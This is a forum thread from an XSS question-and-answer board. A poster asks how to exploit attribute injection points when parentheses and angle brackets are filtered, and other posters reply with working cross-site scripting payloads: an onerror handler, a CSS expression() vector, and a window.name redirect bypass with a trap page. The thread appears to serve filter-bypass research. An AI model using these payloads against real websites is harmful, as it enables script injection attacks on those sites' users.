Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Q and A for any cross site scripting information. Feel free to ask away. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
XSS in <script> and <html> tag
Posted by: choronzon
Date: July 23, 2011 09:46PM

Hello,

I'm working on some challenging XSS: filtered chars == ),(,>,<

<script type="text/javascript" src="/pathINJTION_POINT.js"></script>

injection example:

<script type="text/javascript" src="/path" myField="aaa" crap="xyz.js"></script>

Something similar here:

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="INJECTION_POINT">

Any suggestion on how exploit this ?

Thanks,
c.

Options: ReplyQuote
Re: XSS in <script> and <html> tag
Posted by: lightos
Date: July 24, 2011 07:15AM

<script type="text/javascript" src="/path" onerror="alert(0)" crap="xyz.js"></script>

Options: ReplyQuote
Re: XSS in <script> and <html> tag
Posted by: Anonymous User
Date: July 24, 2011 12:19PM

<script type="text/javascript" src="/path" style="x:expression(alert(1))"></script>

Options: ReplyQuote
Re: XSS in <script> and <html> tag
Posted by: choronzon
Date: July 24, 2011 12:59PM

Thanks for your vector, but as I mentioned "(" and ")" are filtered!

Options: ReplyQuote
Re: XSS in <script> and <html> tag
Date: July 25, 2011 07:34AM

<script type="text/javascript" src="/path" onerror="javascript:location=window.name"></script>

and prepare trap page:
window.open( "target.html", "javascript:alert(1)" )

Options: ReplyQuote
Re: XSS in <script> and <html> tag
Posted by: Ivan
Date: August 03, 2011 01:07PM

^ Cool ;)

http://www.security-net.biz/

Options: ReplyQuote


Sorry, only registered users may post in this forum.